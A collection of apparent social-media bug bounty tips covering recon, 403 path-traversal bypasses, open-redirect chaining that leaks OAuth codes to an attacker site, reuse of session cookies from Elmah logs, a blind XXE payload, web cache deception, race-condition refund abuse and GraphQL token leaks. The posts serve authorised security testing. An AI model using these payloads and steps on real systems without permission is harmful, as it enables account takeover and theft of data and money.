Bug Bounty Tips: Finding additional targets connected to your widescope target. Have you exhausted your options for discovering associated assets through CIDR, Reverse WHOIS, Favicon Hash, DNS Records, Acquisitions, etc.? Here's another method to identify additional assets related to a target site: explore tag history. This site reveals all associated assets based on the usage of the same tag. Here's how to access this valuable data: 1️⃣ You must login to builtwith.com/ 2️⃣ Visit builtwith.com/relationships/… You'll find a list of assets associated with your target domain. Use this information to further verify, investigate, and hunt for potential findings on additional targets. #BugBounty #HackerOne #BugCrowd #BugBountyTips #SecurityTips 🐛🔍🛡️
9
120
513
36,757
Bug Bounty Tips💰: Easy $2000 bounty via enabled "PUT" method! Here’s the nuclei template I used to identify this vulnerability: 🔗 github.com/projectdiscovery/… The key question: If it’s a public nuclei template, why wasn’t it flagged as a duplicate, and how come no one else found it? Here’s the difference: Most people run default nuclei templates only on root domains/subdomains. However, certain templates (like this one) might make sense to run on all directories of a target as there could be a certain directories configured to accept/allow "PUT" requests. What I did differently: 1️⃣ Collected all target paths using tools like Katana and ffuf for path fuzzing. 2️⃣ Ran the relevant nuclei template on these paths/directories rather than just the root. The result? This approach uncovered a valid bug missed by others. 🚨Takeaway: Not all findings need to be unique—sometimes, it’s about using the right tools in the right way. Review nuclei templates and identify those that might make sense to run on all paths of your target. #BugBountyTips #HackerOne #BugCrowd #Nuclei #CyberSecurity #Recon #OSINT
8
82
503
24,717
🤫 Unveiling a Hidden Technique: Bypassing 403 Access Denied Resources 🚀 Have you ever been frustrated by a 403 error on a specific web resource while others remain accessible? 🔒 Well, here's a secret you might find intriguing! Some websites use custom rules that rely on poorly crafted path-blocking to enforce restrictions, and we've discovered a clever way to bypass them. 🕵️‍♂️ Let's take an example: imagine you're trying to access https://target/api/admin/users/123, but it's blacklisted and shows a 403 access denied error. However, In most cases the underlying endpoint is actually vulnerable to an IDOR If you can actually get past these restrictions. To bypass this protection - You can try appending a fake path like https://target/api/fakepath/..%2f/admin/fakepath/..%2f/users/123. This technique tricks the server into thinking you're not trying to reach https://target/api/admin/users/123. When it successfully bypasses the poorly designed custom rule meant to prevent access, the outcome depends on how the backend interprets ..%2f. In some cases, it might end up being treated as https://target/api/admin/users/123, granting you unauthorized access to protected resources! 🛡️ Deceive the Web Application Firewall (WAF) or Servers, gain access to restricted resources, and potentially earn handsome bounties! 💰 🚀Lesson: Always remember to explore different techniques for breaking through these restrictions. There are numerous secrets waiting to be uncovered! 🔐 #CyberSecurity #Bypass403 #Hacking #HackerOne #BugCrowd #bugBountyTips #SecurityTips
18
101
484
37,267
🔐💰 Question of the day: How can you maximize payouts for "Low" risk open redirect issues? 🤑 I've personally earned over $30,000 in bounties by chaining open redirect submissions to ATOs. These "Low" severity bugs can often be escalated through a double redirection, resulting in bounties ranging from $750 to $5000, depending on the program. Open redirects can be chained with legitimate redirects, allowing attackers to exfiltrate OAuth codes and tokens for potential account takeovers. Here's the quick breakdown: (1) Find a low-severity open redirect, for example: example.com/next-step?url=at…. (2) Look for site login functionality on core domains or subdomains. Assuming login is integrated with Auth0 or another equivalent service provider at login.example.com. In such cases, a valid redirect would usually look something like login.example.com?redirect_u… (3) You can now chain the vulnerable open redirect identified in step 1 with the login page and still be able to exfiltrate the login code in most cases. For example, you could craft a URI like login.example.com?redirect_u… When a victim navigates to the above link and logs in, upon successful login, it will redirect them in this flow to the attacker controlled site: login.example.com -> (First Redirect) example.com/next-step?code=:…: -> (Second Redirect) attackersite.com?code=:login…: As a result, this ultimately leads to the leakage of Auth0 or other equivalent codes/tokens to an attacker-controlled server, resulting in an ATO. Common mistakes: Reporting open redirects as simple issues without escalating their impact. Don't underestimate their potential. Always look for ways to level up! 💡 #BugBounty #InfoSec #openredirect #cybersecurity #bugbountytips #hackerone #bugcrowd,#securitytips,#questionoftheday
22
102
487
37,243
🔍 Question of the day: What automated checks can you perform after subdomain reconnaissance?🌐 Many people gather subdomains but struggle with what to do next with this dataset. Here are some automated checks you can conduct on these subdomains: 🌀 Subdomain Takeovers: Verify subdomain takeovers using tools like Nuclei and dnsReaper. 📂 Passive Source URLs: Gather as many URLs as possible from passive sources such as Wayback Machine and AlienVault. Consider using Waymore, an excellent tool for this purpose. 📝 Active Source URLs: Collect active URLs and parameters using Katana. 🔍 Custom Nuclei Templates: Develop your custom Nuclei templates to check for SQL injection (SQLI), cross-site scripting (XSS), server-side template injection (SSTI), etc. For example, look for SQLI in User-Agent and Referer headers, and XSS in parameters and URIs. Apply these templates to all collected URLs. 🔐 Check for Leaked Secrets: Utilize Nuclei templates to search for leaked credentials or secrets on these URLs. 🧩 JS Files and Monitoring: Extract all JS files from passive and active sources and identify APIs using tools like LinkFinder, JSLuice, and GAP. Automate crawling these APIs and create custom regex patterns to detect sensitive data or large responses. Apply a similar approach to identify hard-coded credentials. 🚀 Directory Fuzzing: Employ wordlists from Assetnote for directory fuzzing on these subdomains to uncover hidden files and directories. Filter out HTTP status codes like 200 and 301, then investigate further. 🔎 Automated Parameter Mining: Develop custom scripts to automatically discover hidden parameters on collected URLs. Once identified, run these through your custom Nuclei templates again. 🌟 Identify Interesting Assets: Use title, keywords in response bodies, knowledge of vulnerable products, and more to identify intriguing assets for manual review. There are many additional ideas you can build upon to enhance your automation capabilities. Stay tuned for more insights! 🐛💰 #BugBounty #Automation #InfoSec #BugBountyTips #HackerOne #BugCrowd #SecurityTips
12
112
472
38,720
Scored a $5,000 bounty today. I’ve only started messing around with AI in my workflow THIS week. Normally I’d spend hours trying to escalate certain bugs - the kind that takes a lot of digging and escalation and I'd usually end up moving away from it considering the ROI. But this time I let AI handle some of the painful parts of the manual escalation process and it actually helped me efficiently escalate the bug. Ended up turning what would’ve been a tiny payout into a $5000 bounty. Now I’ve basically got Burp Suite on one screen, AI on the other, and it feels like cheating (in a good way). This might actually change how I hunt moving forward with respect to escalating stuff to avoid manual work whereever possible. 🚀
23
17
558
27,075
🔒Bug Bounty Tips - Here's how I earned a $6000 Bounty by escalating a simple Elmah File Disclosure Issue 🔒 💡 If you haven't already, add /elmah and /elmah.axd to your wordlist! These paths often lead to Elmah file disclosures, a finding many researchers report as Low/Medium severity (P3/P4). Here’s how I used Elmah log disclosure to escalate and achieve internal employee account takeovers in three separate cases. 🕵️ How to Leverage Elmah Disclosures for Account Takeover: 1️⃣ Locate the Elmah File: Found an Elmah file on your target? Open it by navigating to /elmah or /elmah.axd. 2️⃣ View Error Logs: Click "Details" on any log entry to reveal the full HTTP request, including headers. 3️⃣ Look for Session Cookies: The details may expose session cookies or internal routes tied to authenticated users. 4️⃣ Attempt Account Access: Use the disclosed session cookies on a request to the target, e.g., http://example[.]com. In many cases, this results in access to an internal employee or administrative accounts! ⚠️ Bonus Tip: Sometimes, Elmah files are set to delete logs hourly. If the logs are empty, don’t give up yet! Monitor the Elmah file for a few hours; an error log with authenticated user session cookies is likely to show up eventually. #HackerOne #Bugcrowd #BugBountyTips #YesWeHack #Intigriti #BugBounty
7
102
475
29,324
🔍Question of the Day: Where to hunt for XXE (XML External Entity) vulnerabilities? XXEs are lurking in unexpected places! When it comes to identifying XXE issues, you'll find these vulnerabilities almost everywhere. Here's my top 5 list of features and areas you should keep an eye on when testing for XXE issues: 1️⃣ XML APIs - Test target apps and see If XML is being used or alternatively try replacing content-type: application/json to application/xml or text/xml with a XML body 2️⃣ SOAP APIs - Working on a target app that supports SOAP? Test for XXE payloads 3️⃣ SAML Authentication - Test XXE on the SAML flow 4️⃣ HTML parsing (e.g., converting HTML to some other file type) 5️⃣ SVG File Upload - Assuming that the app supports SVG file upload and parses SVG. You can try this payload gist.github.com/jakekarnes42… These areas often conceal potential XXE vulnerabilities waiting to be uncovered. The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator. <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://BURP_COLLABORATOR[.]burpcollaborator[.]net/x"> %ext; ]> 📦 For a plethora of payloads and examples, explore the XXE Injection cheat sheet at 🔗 github.com/swisskyrepo/Paylo…. Stay vigilant! XXEs might be hiding where you least expect them. Happy hunting! 🕵️‍♂️💡 #BugBounty #Cybersecurity #XXE #Vulnerabilities #HackingTips #HackerOne #BugCrowd #BugBountyTips
15
130
474
42,446
🎯 Question of the Day: How do you approach a new bug bounty target? 🕵️‍♂️ Starting fresh on a bug bounty program? Here are my top 5 essential checks to kick off your hunt for vulnerabilities, but keep in mind that the actual checklist is much more extensive. 🔍 Top 5 Manual Checks: 1️⃣ Login Flow Testing - Check authentication processes for issues like OTP rate limiting, password reset vulnerabilities, Account Takeovers (ATOs), and XSS ATOs. 2️⃣ CSRF Validation - Verify GET/POST methods, form submissions, and the implementation of CSRF tokens and test for CSRF Issues on all sensitive endpoints 3️⃣ IDOR Investigations - Detect requests accepting IDs or UUIDs; create two accounts, and meticulously test for Insecure Direct Object Reference (IDOR) vulnerabilities. 4️⃣ Manual XSS Sweeps - Personally inspect pages for GET/POST-based XSS flaws (Reflected, Stored, DOM-based, etc.). Use Burp extensions like Param Miner to uncover hidden parameters and test for XSS vulnerabilities. 5️⃣ RBAC Assessments - If the application features multiple roles, assess access control issues to potentially elevate privileges. Automated Scans: 1️⃣ Subdomain Takeovers - Automatically search for subdomain takeover possibilities. 2️⃣ XSS, SQLI, SSTI, OR, etc. Scans - Leverage automated tools to detect common vulnerabilities on your active/passive crawling dataset. 3️⃣ CVE Scanning - Scan for known Common Vulnerabilities and Exposures (CVEs). 4️⃣ Associated Asset Scanning - Identify and scan associated assets, particularly if the target has a broad scope. 5️⃣ Common Misconfigurations - Scan using nuclei templates for common misconfigurations Hybrid Approach (Mix of Manual and Automated): 1️⃣ Automation Leads Exploration - Investigate promising leads from automation, such as intriguing API endpoints or parameters from active/passive sources. 2️⃣ Secrets Hunt - Search for hardcoded secrets in JavaScript files, utilize GitHub dorks, Google dorks, and Dehashed. 3️⃣ API Endpoint Discovery - Extract interesting API endpoints from pages, JavaScript files, Swagger documentation, etc. 4️⃣ Directory Fuzzing - Fuzz directories to uncover hidden files or folders, then manually investigate potential leads. 5️⃣ Keyword-Based Targeting - Use specific keywords (e.g., Login, Register, Admin, Dashboard) found during automation to narrow your focus. 📚 Takeaway: Diversify your approach and combine manual and automated techniques to maximize your bug bounty hunting success. Each target is unique, so adapt your strategy accordingly. 🚀 Seeking more tips and insights? Stay tuned for future tweets and discussions. Happy hunting! 💰🐛 #BugBounty #Cybersecurity #HackerOne #BugCrowd #Infosec #Bugbountytips
15
139
467
29,769
Bug Bounty Tip: Keeping It simple & consistent Over time, I’ve realized that overly complicated automation in bug bounty isn’t as exciting or rewarding—at least not for me. Instead of trying to automate everything under the sun, I’ve found that focused, consistent recon on core targets works much better. Here’s what’s been working for me: ✅ Daily Recon on Favorite Targets – Just simple, routine checks on a limited set of targets around 10-15 wide scope programs. ✅ Regular Scans & Fuzzing – Run top CVE templates, VHost checks, and other essential tests using ffuf, katana, nuclei, jsluice, etc. ✅ Subdomain Takeover Monitoring – One of the few things worth running across everything. ✅ 0-Day Research & Collabs – If you’re working on new research or working with someone else, spread these checks across multiple assets. For the past 1-2 months, I’ve mostly been chilling, only reporting leads from automation 80-90% of the time. i.e. Still requires me to manually look at It and escalate the bug and that still seems to be resulting in 8-10 reports per month and $40K-$50K in bounties on average. The key takeaway? Simplicity, consistency, and strategic targeting matter way more than bloated automation. Keep refining your workflow and focus on what actually works.
12
63
469
29,411
Bug Bounty Tips: Account Hijacking via Invite Flows💰 I've reported 10+ similar issues involving these scenarios, securing me some quick victories! People often overlook straightforward logical issues, rushing to tackle the complex ones. However, these issues are deceptively simple and can yield substantial bounties! Here are the prerequisites that must be met to proceed with these attacks: 1️⃣ Ensure your target app supports inviting team members within the application. 2️⃣ Verify that your target app allows account signup without email verification, or identify an email verification bypass vulnerability. Here's my approach to identifying and reporting these issues: 1️⃣ Log in to your account and invite a new team member, e.g., testaccount@example.com (Ensure this account isn't registered on the platform). 2️⃣ This typically sends an invitation link to testaccount@example.com to sign up and join the team by accepting the invite. 3️⃣ To test if the target app is vulnerable, disregard the invitation email link and attempt to sign up for an account directly using testaccount@example.com, assuming no email verification is required on the target app or that you've identified an email verification bypass. 4️⃣ Once logged in to the target app, you'll likely discover an invitation that enables you to accept it on behalf of the victim, granting unauthorized access to the team with the assigned role (e.g., admin, team, etc.), resulting in a significant security impact. The issue here is that anyone can sign up using an email that hasn't been registered on the platform yet but is awaiting a pending invitation, possibly with an admin role or another role in an organization. This invitation can be accepted once you've logged in, allowing the attacker to hijack it and gain unauthorized access to the organization. Takeaways: Don't underestimate the simplicity; these quick wins are accessible to anyone and can earn you some rapid $$$! 💡💸 #BugBounty #Cybersecurity #HackingTips #HackerOne #BugCrowd #BugBountyTips #InfoSec
23
102
446
55,733
Bug Bounty Tips: 🐛🌟 Want to excel in bug bounty hunting? Don't limit yourself to one program or asset. What if I told you that monitoring new assets and programs from various sources can increase your chances of success? 🚀 Here's a valuable list of sources to track all bug bounty platforms and assets: 1️⃣ Chaos Bug Bounty List - Explore public programs and self-hosted bug bounty program assets: 🔗 github.com/projectdiscovery/… 2️⃣ Bug Bounty Targets Data - Access programs and assets from bugcrowd, hackerone, hackenproof, intigriti, yeswehack, and more: 🔗 github.com/arkadiyt/bounty-t… 3️⃣ bbscope - Utilize this awesome CLI tool to collect information about private program targets using your API: 🔗 github.com/sw33tLie/bbscope What can you do with this data? Here are some ideas: 1️⃣ Monitor these sources for new scope updates and receive notifications on Discord, Slack, or via email. 2️⃣ Establish an automated process to handle new targets, such as collecting subdomains and performing basic checks. 3️⃣ Identify interesting assets and start manual hunting to increase your chances of discovering bugs and reducing duplicates. 🕵️‍♂️ Follow these accounts for real-time scope updates: 1️⃣ h1disclosed - Twitter: 🔗 nitter.app/disclosedh1 - Get notifications on program launches and disclosed reports. 2️⃣ bbradar - Track all bug bounty programs at: 🔗 bbradar.io/ 3️⃣ inbbupdates - Twitter: 🔗 nitter.app/inbbupdates - Receive notifications on scope changes. This dataset offers endless possibilities. Don't miss out on this opportunity, as many are already harnessing its potential. Elevate your bug bounty game today! 💪🔒 #hackerone #bugcrowd #cybersecurity #bugbountytips #securitytips #bounty #bounties #follow #motivation 🚀💡
12
115
428
36,446
🔐 Show & Tell: Uncovering a Simple Web Cache Deception Vulnerability That Paid Off 💰💰 Cache Deception issues might seem complex, but with the right approach, they're straightforward and can lead to generous rewards, ranging from $1,000 to $10,000, depending on the impact. Today, I'll share how I discovered a basic web cache deception issue that allowed me to access users' PII data through caching, resulting in a "High" payout. Here's my step-by-step approach: 1️⃣Got Invited to a private program - My first move was to inspect the Request/Response headers for common misconfigurations. I immediately spotted common cache headers like Server-Timing, CF-Cache-Status, X-Cache, X-CDN, etc. 2️⃣Identifying interesting cache headers - Once I pinpointed these headers, the next step involved analyzing the application's behavior. I sent sample endpoints/APIs to Repeater and appended tricky paths to the URIs. For example, if the path "https://target(.)com/api/v1/users" returned sensitive PII, I tried appending variations like "https://target(.)com/api/v1/users/self.css" and "https://target(.)com/api/v1/users/self/.js" to observe if there was a cacheable response. 3️⃣A straightforward cache issue - In my case, it was a simple cache issue as the endpoints returned HTTP 200 with the appended suffix and response with a cache HIT :) The attack scenario involved crafting and sending a malicious link, "https://target(.)com/api/v1/users/self/.js?cachebuster" to a victim. When the victim, already logged in, opened the link, it led to caching the victim's PII data due to the misconfiguration. 4️⃣Exploiting the cache - When navigated to "https://target(.)com/api/v1/users/self/.js?cachebuster" as an attacker using Chrome Incognito, the cached response was found containing the victim's PII data from "/api/v1/users/self/" resulting in a risk of sensitive information disclosure. While this was a relatively straightforward scenario, more complex techniques can help escalate these Issues to an ATO by chaining CSRF, XSS, etc., potentially requiring parameter mining and/or bypassing limitations. We'll look into these examples in future tweets! Takeaway: Always keep an eye out for cacheable response headers and ensure this vulnerability class is part of your checklist. If you find a cacheable response but can't exploit it, feel free to drop a message for collaboration. 😊 Thanks for reading! #HackerOne #BugCrowd #SecurityTips #BugBountyTips #Security #WebCache #BugBounty 💻🔒
9
97
441
38,687
Bug Bounty Alert: Sensitive token disclosure. Hurry and add /auth.json to your wordlist Be quick to grab some nice wins :) Here's the new nuclei template by DhiyaneshDk - raw.githubusercontent.com/pr…
16
92
427
61,013
Bug Bounty Tips: Learn from My Early Mistakes 🚫 In my bug bounty journey, I've made several mistakes that I hope you can avoid. Here are the top 5 lessons: 1️⃣ Program Diversification: Imagine you've found a goldmine program with a stack of issues to keep you busy for months. It's tempting to focus all your efforts there, but why just stick to one program? Instead, seize this opportunity to diversify. Find 1-2 backup programs to hunt on. You're motivated and can handle multiple programs at once. This approach builds multiple income streams, reducing your reliance on a single favorite program. The strategy would be to report 2-3 issues on your favorite program and then hop on to explore new programs to find Issues on there for future readiness. Can't find any Issues? Time to buy some more motivation by reporting an Issue on your favorite program and then keep jumping back and forth. 2️⃣ Comfort Zone Trap: Landing a big bounty or a couple of them might make you want to kick back and relax for the rest of the month. However, if you're just starting out, it's crucial not to get too comfortable. I learned this the hard way. Staying in your comfort zone can stunt your growth. Instead, aim to double your monthly targets. This strategy ensures consistent progress and mitigates the impact of lean months. 3️⃣ XSS to ATO Escalation: Reporting XSS issues is great, but don't stop there. One of my biggest regrets is not escalating XSS to Account Takeover (ATO) issues. I potentially missed out on substantial rewards over 100k+. Some programs are willing to pay generously for XSS escalations to ATO up to $10k-30k. If you're unsure how to escalate, feel free to reach out to me for collaboration. 4️⃣ Automation Neglect: I made the mistake of ignoring automation for over two years. If you're not using any automation, you're likely missing out on numerous opportunities. Even a basic automation setup can help you save time and uncover issues that manual testing might overlook. 5️⃣ Balancing Automation: While automation is a valuable tool, it shouldn't be your sole reliance. Bug bounty hunting isn't a guaranteed source of free money. Even with automation, it's crucial to maintain a hybrid approach. This means investigating the leads generated by your automated tools thoroughly. A well-rounded manual testing methodology is essential for success. Avoid these early mistakes, and you'll be better equipped for your bug bounty journey! 🚀💰 #BugBounty #InfoSec #SecurityTips #HackerOne #BugCrowd #Cybersecurity
28
81
406
33,625
🚀Question of the day: How to Identify & exploit race condition Issues? 🏁 I've reported 30+ race condition Issues, and it's been quite the profitable journey! 🤑 Despite their prevalence, these vulnerabilities often fly under the radar. 📚 Real-World Scenarios: Let's dive into some real-world examples where race condition Issues can be a goldmine: 1️⃣ Daily Bonus Claim: Beat the "once a day" limit via a race condition attack to claim multiple bonuses. 2️⃣ Limited Seats: Exceed the allocated seats per account by inviting more users than allowed. 3️⃣ Order Cancellation: Exploit race condition Issues on order cancellations to receive multiple refunds for the same order. 4️⃣ License Limitations: Overcome app restrictions that limit actions per license through a race condition attack. 5️⃣ Daily Action Limit: If there's a daily limit on an activity, use a race condition attack to show that the limit can be bypassed. Exploitation in Action: 1️⃣🔍 Identifying Race Condition Vulnerabilities: Start by identifying functions that are restricted by limitations. The examples I've mentioned are just the tip of the iceberg, and there could be similar functions within your target. 2️⃣ Intercept: Use tools like Burp Suite to intercept and send request to Turbo Intruder 2️⃣ Send Multiple Payloads: Send 30-50 payloads in within a short timeframe. This overload can lead to unexpected outcomes as the system struggles to handle concurrent requests. Race conditions are a treasure of opportunities, and the potential for profit is substantial. Takeaways: Don't underestimate the power of race condition Issues. Include them in your checklist for bug hunting, and you might just land some lucrative bounties. Remember, these principles apply not only to traditional web applications but also to the exciting realm of Web3 security. 🌐💰 #CyberSecurity #BugBounty #HackerOne #bugbountytips #securitytips #bugcrowd
11
105
427
38,428
🔐Bug Bounty Tips: How to Identify and exploit Akamai Cache Deception/Poisoning Issues? 1️⃣ Assuming you're navigating an Akamai site and spot headers like cdn-cache; desc=MISS or cdn-cache; desc=HIT or any other headers Indicating a cache HIT, you're in luck! 🍀 2️⃣ Alternatively, try adding extensions like js, jpeg, php, css, woff2, etc., e.g., https://target(.)com/api/v1/users/self/.css?cachebuster, to see if you get a HIT. 3️⃣ Next, hunt for parameters, headers, cookies, etc., on all pages to find any reflecting ones. 4️⃣ It's almost impossible to do this manually at a widescale. Therefore, you must use Parameter Miner Burp Suite Extension and send your request for parameter mining and select "Guess Everything!" This will try to identify all reflective headers, cookies, and parameters. 5️⃣ Test the identified parameters for Self-XSS Issues. Once you've identified vulnerable parameters, headers, or cookies, you must then exploit these along with Cache Poisoning or Cache Deception. 6️⃣ Alternatively, if you don't want to go the XSS route, check If you can use cache deception to exfiltrate sensitive user tokens or PII data too by caching a sensitive page that leaks user's session token or other PII data, or you can try to go for DoS too. 7️⃣ Assuming you're going with the XSS route, chain the Self-XSS with Cache Poisoning/Deception and convert that into a 0 interaction ATO. 8️⃣ Create a PoC video demonstrating the attack scenario i.e. cache a page with your payload then demonstrate that cached content with your payload is being served when accessed via Chrome Incognito or some other browser and submit your report to win some nice bounties! 🎥💰 #BugBounty #Akamai #CacheDeception #SecurityTips #Infosec #BugBountyTips #HackerOne #BugCrowd Note - Same concept applies to other CDNs too.
13
102
419
24,545
🐛 Bug Bounty Tips: Unlocking GraphQL's Hidden Potential 🌐 When it comes to GraphQL, it's easy to assume that all operations are accessible through a target app's functionality. But by limiting your research, you might miss out on valuable opportunities. Today, I'll share steps to expand your attack surface on GraphQL target apps, gaining a competitive advantage in finding and reporting security issues that could lead to some rewarding bounties! 1️⃣ Identifying GraphQL Targets: Start by identifying GraphQL targets using the powerful Nuclei Scanning: nuclei -l <targetlist.txt> -t graphql-detect.yaml You can find the nuclei template at raw.githubusercontent.com/pr… 2️⃣ Retrieve the GraphQL Schema for hidden Query/Mutations: If Introspection is enabled, you can obtain the GraphQL Schema, revealing hidden GraphQL Operations and Mutations using the following GraphQL Query: {"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} 3️⃣ Visualize with GraphQL Voyager: To visualize the GraphQL Schema effectively and craft your attack vector, use GraphQL Voyager—a powerful tool to help you navigate the schema: graphql-kit.com/graphql-voya… 4️⃣ Retrieve Hidden Queries and Mutations: Retrieve GraphQL Queries and Mutations from JavaScript files when Introspection is disabled. These files may list hidden methods not accessible via the app's regular functionality. Try making direct requests to these. 5️⃣ Craft Your Attack: Craft your attack using the identified GraphQL Queries and Mutations. These methods are often vulnerable to various bug classes, including IDOR, RBAC, Race Condition, SQL, and more. If you can't find more GraphQL Queries and Mutations, don't worry! Stay tuned for upcoming insights on how to brute force and discover hidden ones. Takeaways: Don't hit a dead end with GraphQL apps. Dive deeper, find those concealed GraphQL Queries and Mutations, and unlock unimaginable functionalities that can lead to significant bounties! 💰🔐 #Cybersecurity #BugBounty #GraphQL #HackingTips #InfoSec #Hackerone #Bugcrowd #GraphQL #SecurityTips #BugBountyTips
13
94
410
45,014
🕵️‍♂️ Show & Tell: Here's how I exploited a simple Issue on target app using GraphQL that allowed me to take over any user's account 💰💰 This is a classic case of thinking outside the "box." The app I targeted allowed Inviting users to your organization. When an invite is sent to the victim, they get a link like http://targetapp/invitation/{token}. What was interesting was that the invitation link automatically logged a victim into their account and asked them if they wanted to accept the invitation. 🚨 This grabbed my attention, prompting the question, "Can I somehow acquire that Invitation token?" Considering its potential to let me take over any person's account, I immediately delved deeper into the app and came across a GraphQL operation for retrieving the list of invited users: code[{"operationName":"GetPendingMembers","variables":{"ID":"XXXX"},"query":"query GetPendingMembers($ID: ID!) {\n users: GetPendingMembers(ID: $ID) {\n invited { email\n role\n createdAt\n updatedAt\n __typename\n }\n __typename\n }\n}\n"}] Looking at this, I thought, "What if the 'invited' object has more info than shown?" So, I added the \n token parameter Inside the invited object: code[{"operationName":"GetPendingMembers","variables":{"ID":"XXXX"},"query":"query GetPendingMembers($ID: ID!) {\n users: GetPendingMembers(ID: $ID) {\n invited {\n token email\n role\n createdAt\n updatedAt\n __typename\n }\n __typename\n }\n}\n"}] Surprisingly, it worked! The GraphQL operation returned the token that was sent to victims email. Crafted a URI with the leaked token, like http://targetapp/invitation/{token}, and took over the victim's account. Lesson: Always think outside the box. Instead of just hunting for vulnerabilities, notice odd app behaviors— they might lead you to unexpected weaknesses. Understand how the app works, find flaws, and outsmart the design. 👾 #BugBounty #AppSecurity #ThinkOutsideTheBox #HackerOne #BugBountyTips #SecurityTips #BugCrowd #InfoSec #Bounties #Bounty #Tips #Follow
10
77
401
31,040
Bug Bounty Tips: Discover associated domains for your target organization with Reverse WHOIS Search Working on a widescope target and aiming to gather as many associated domains as possible? Here's a free service that can provide you with all the domains linked to a target organization, significantly increasing your chances of finding untouched assets for quick wins! Here's how to access this valuable information: 1️⃣ Sign up at tools.whoisxmlapi.com/ 2️⃣ Visit tools.whoisxmlapi.com/revers…, enter the registrant organization, phone, or email, and click "Search." 3️⃣ The service will provide you with a list of targets associated with that organization. Begin manual hunting on these targets and/or add them to your automation target list to secure some bounties! #BugBountyTips #SecurityTips #HackerOne #BugCrowd #Recon #OSINT 🕵️‍♂️🎯🔍
6
90
398
30,990
🤔Question of the Day: How to tackle unpredictable IDs in IDOR or RBAC Issues? I've reported 50+ Issues relying on HASH/UUIDs, and surprisingly, duplicates have been rare. It seems many are hesitant to report these for fear of them being labeled "Informative" or "N/A." But today, let's explore how you can approach these Issues and increase your chances of acceptance: Here's how to unearth UUIDs and transform your IDOR/RBAC Issues into reportable gems: 1️⃣ Sign Up and Forgot Password Page: If you've discovered a service reliant on a user's account UUID, try signing up or using forgot password with a victim's email. The server might leak the UUID in the error response, e.g., "Error": "User Already Registered." "ID: "UUID" or "Message": "Verification Email Sent" "ID: "UUID" 2️⃣ Intentionally Exceed Rate Limits on Login: Deliberately trigger more user-specific errors by exceeding rate limits. Sometimes, server-side functions expose the UUID in responses. For instance, failing multiple login attempts may reveal the UUID when the response mentions an account lockout, e.g., "Error": "User Account Locked Out." "ID: "UUID" 3️⃣ User-Interactive Features: Keep an eye out for features like Add Friend, Search User, Chat, Invite User, or Follow User. These often enable you to interact with other users, and as a result, the UUID of the user might be exposed in responses. 4️⃣ Archived URLs with Unpredictable IDs: Explore leaked unpredictable IDs using Wayback, Waymore, or use Google Dorking to hunt for archived links or URLs related to the target app 5️⃣ Target Apps with Multiple Roles: If your target app supports multiple roles (e.g., Admin, Team Member), and you've identified improper access control issues, you're in luck. Team members within the same organization might have access to all target app components, along with the UUIDs within the same tenant. Make sure to highlight this in your report. 6️⃣️Predictable Patterns: Are you kidding me? No, I am not. I've worked on target apps that had predictable ID patterns. People Ignore these patterns cause the moment someone sees complex IDs, they tend to get nervous. However, It is important that you generate multiple IDs on the object you're working on and make note of the ID patterns. I've noticed patterns like 3fd537eea0e7d425943be204, which at a glance looks complex. But I generated a couple of more e.g. 3fd537eea0e7d425943be121, 3fd537eea0e7d425943ba404, 3fd537eea0e7d425943be934.. Doesn't look complex anymore, does it? 7️⃣ Search Your Own Unpredictable UUIDs/Hashes: Look for your own UUID / Unpredictable ID in your Burp Suite HTTP Traffic for additional requests/responses where these IDs are inadvertently leaked. You may end up finding a request that can be used for accessing other user's UUIDs too. Can't seem to crack the unpredictable ID puzzle? Don't worry! These are still reportable security risks, albeit considered "High" complexity, potentially resulting in "Lower" payouts. Nevertheless, don't disregard them. Depending on your rapport with the program, consider submitting one and see if it gets accepted. At worst, it may be labeled as "Informative." Takeaway: Don't shy away from testing issues tied to unpredictable IDs. Always seek ways to reverse engineer or expose these complex IDs through alternative methods, and be prepared to earn some extra cash! 💰🕵️‍♂️ #BugBounty #Cybersecurity #HackingTips
19
99
394
36,455
🔍Question of the day: How can you uncover and exploit AEM issues successfully? I've reported over 50+ AEM issues, with rewards ranging from $500 to $7500 based on their impact. AEM stands as a widely used product across many bug bounty targets, often falling within the in-scope category. Regrettably, due to a lack of awareness, many individuals fail to delve beyond basic checks on these targets, unknowingly passing up on lucrative opportunities! 🎯Common AEM Issues: XSS, AEM Dispatcher bypass, SSRF, Information disclosure, and more. Here's my step-by-step approach to finding and exploiting AEM issues: 1️⃣ Identifying AEM Targets: Use a dedicated nuclei template found here: https://github[.]com/projectdiscovery/nuclei-templates/blob/main/http/technologies/aem-detect.yaml 2️⃣ Nuclei Template for AEM Detection: Run the command: nuclei -u http://target[.]com -t aem-detect.yaml 3️⃣ Common Vulnerabilities Scanning: After shortlisting AEM targets, search for common vulnerabilities with: nuclei -u http://target[.]com -tags aem, which executes all AEM-specific templates. 4️⃣ Fuzzing: Fuzzing is a very Important step - You can use the wordlist from https://github[.]com/clarkvoss/AEM-List/blob/main/paths to fuzz commonly known misconfigurations. 5️⃣ AEM Hacker Tool: Explore misconfigurations with the excellent tool at https://github[.]com/0ang3el/aem-hacker. Run it using: python3 aem_hacker.py -u https://yourtarget --host your_vps_hostname_ip_for_ssrf_checks Just by performing these basic checks, you should be able to find a couple of security issues (XSS, Dispatcher Bypass, etc.) 🤷‍♂️Nothing worked? Don't worry! Stay tuned for more ideas in our upcoming tweets! 💡 Takeaways: Past failures don't dictate future success. Ensure AEM checks are on your checklist, go beyond basic tests, and witness surprising results! 🙏 Thanks! 💼💻 #BugBounty #AEM #CyberSecurity #InfoSecTips #HackerOne #BugCrowd #BugBountyTips #SecurityTips #nuclei
22
79
397
38,735
